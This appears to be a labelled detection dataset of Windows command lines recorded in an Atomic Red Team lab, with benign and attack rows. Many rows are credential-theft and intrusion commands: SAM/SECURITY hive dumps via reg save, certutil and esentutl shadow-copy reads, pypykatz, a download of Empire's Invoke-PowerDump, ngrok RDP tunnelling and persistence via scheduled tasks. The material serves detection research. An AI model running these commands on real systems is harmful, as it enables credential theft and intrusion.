text
stringlengths
65
3.78k
label
int64
0
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe DeviceCensus.exe "C:\Windows\system32\devicecensus.exe"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
cmd.exe C:\Windows\System32\cmd.exe /c "sc.exe stop spooler" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "echo "Hello from the Windows Command Prompt!" > "%%TEMP%%\test.bin" & type "%%TEMP%%\test.bin"" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA powershell.exe "powershell.exe" & {Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\""}
0
cmd.exe "cmd.exe" /c "del "%%TEMP%%\test.bin" >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %%temp%%\T1222.001_cacls ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "SCHTASKS /Delete /S localhost /U DOMAIN\user /P At0micStrong /TN "Atomic task" /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}}
0
cmd.exe Cmd.Exe "cmd.exe" /c "reg save HKLM\sam %%temp%%\sam & reg save HKLM\system %%temp%%\system & reg save HKLM\security %%temp%%\security" powershell.exe "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\system32\cmd.exe /c btool server list watchdog --no-log splunk.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "cmd.exe" /c "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM" esentutl.exe esentutl.exe /y /vss C:\Windows/system32/config/SAM /d C:\Users\ADMINI~1\AppData\Local\Temp/SAM
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe cmd.exe /c "reg.exe save hklm\security C:\Users\ADMINI~1\AppData\Local\Temp\onqyddyc" WinCreds.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe svchost.exe C:\Windows\System32\svchost.exe -k termsvcs
0
cmd.exe "cmd.exe" /c "icacls.exe %%temp%%\T1222.001_cacls /grant Everyone:F" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe TiWorker.exe C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6250_none_7f16785821e211b6\TiWorker.exe -Embedding
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe cmd.exe C:\Windows\system32\cmd.exe /c btool server list general --no-log
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe sppsvc.exe C:\Windows\system32\sppsvc.exe
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\system32\cmd.exe /c btool server list watchdog --no-log splunk.exe ar-win-dc.attackrange.local
1
reg.exe reg.exe reg save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam cmd.exe "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-2.attackrange.local Administrator
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%ProgramFiles%\7-zip\7z.exe" (exit /b 1)" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== powershell.exe "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\1thdzlht.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC4B4.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC437413C06BDA4FE78897DEC5E82414CB.TMP"
0
cmd.exe "cmd.exe" /c "del C:\inetpub\wwwroot\b.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\tests.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\cmd.aspx /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "cmd.exe" /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a" certutil.exe certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss7 2
0
reg.exe unknown C:\Windows\System32\reg.exe save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam cmd.exe C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "at 13:20 /interactive cmd" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBB4E.tmp" "c:\Users\Administrator\AppData\Local\Temp\s1oh1tyf\CSC52BB1242C3B479098FFC7D2D6250ED.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe sc.exe "C:\Windows\system32\sc.exe" start wuauserv
0
ar-win-2.attackrange.local Administrator "cmd.exe" /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a" certutil.exe certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy9\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss9 2
0
cmd.exe "cmd.exe" /c "SCHTASKS /Delete /TN spawn /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
sc.exe unknown C:\Windows\System32\sc.exe stop spooler cmd.exe C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001_attrib ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\pug2a4w5\pug2a4w5.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB1B9.tmp" "c:\Users\Administrator\AppData\Local\Temp\pug2a4w5\CSC5FC7D1EA5BB6424F85C99730B1AC79A5.TMP"
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\be0epwcq\be0epwcq.cmdline"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"
0
cmd.exe C:\Windows\System32\cmd.exe /c "sc.exe start spooler >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" & schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD05C.tmp" "c:\Users\Administrator\AppData\Local\Temp\50awgclv\CSC70654913B7114EA791D63B9C4E95EC6.TMP"
0
cmd.exe C:\Windows\system32\cmd.exe /c btool web list settings --no-log splunk.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe" & sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "cmd /r cmd<C:\AtomicRedTeam\atomics\T1059.003\src\t1059.003_cmd.cmd" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" RemoveTaskDelayStartTrigger /LegacyServiceBehavior
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB5EF.tmp" "c:\Users\Administrator\AppData\Local\Temp\denmf3pb\CSCFA7AB053470C4C15987ED07EDD6ACF16.TMP"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%ProgramFiles%\7-zip\7z.exe" (exit /b 1)" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe Cmd.Exe "cmd.exe" /c "mkdir C:\AtomicRedTeam\atomics\T1560.001\victim-files & cd C:\AtomicRedTeam\atomics\T1560.001\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%%ProgramFiles%%\7-zip\7z.exe" u archive.7z *txt -pblue & dir" powershell.exe "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADYAMAAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== ar-win-dc.attackrange.local Administrator
1
cmd.exe "cmd.exe" /c "reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\an1mexxx\an1mexxx.cmdline"
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ngrok.exe unknown "C:\Users\Public\ngrok\ngrok.exe" tcp 3389 powershell.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe "cmd.exe" /c "mkdir %%temp%%\T1222.001_cacls & echo T1222.001_cacls1 >> %%temp%%\T1222.001_cacls\T1222.001_cacls1.txt & echo T1222.001_cacls2 >> %%temp%%\T1222.001_cacls\T1222.001_cacls2.txt" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c echo Hello, from CMD! cmd.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "mkdir %%temp%%\T1222.001_attrib & echo T1222.001_attrib1 >> %%temp%%\T1222.001_attrib\T1222.001_attrib1.txt & echo T1222.001_attrib2 >> %%temp%%\T1222.001_attrib\T1222.001_attrib2.txt & attrib.exe +r %%temp%%\T1222.001_attrib\T1222.001_attrib1.txt & attrib.exe +r %%temp%%\T1222.001_attrib\T1222.001_attrib2.txt" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "C:\Python311\python.exe" "C:\Python311\Scripts\pypykatz.exe" live registry cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\osmwwrxw.cmdline"
0
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBz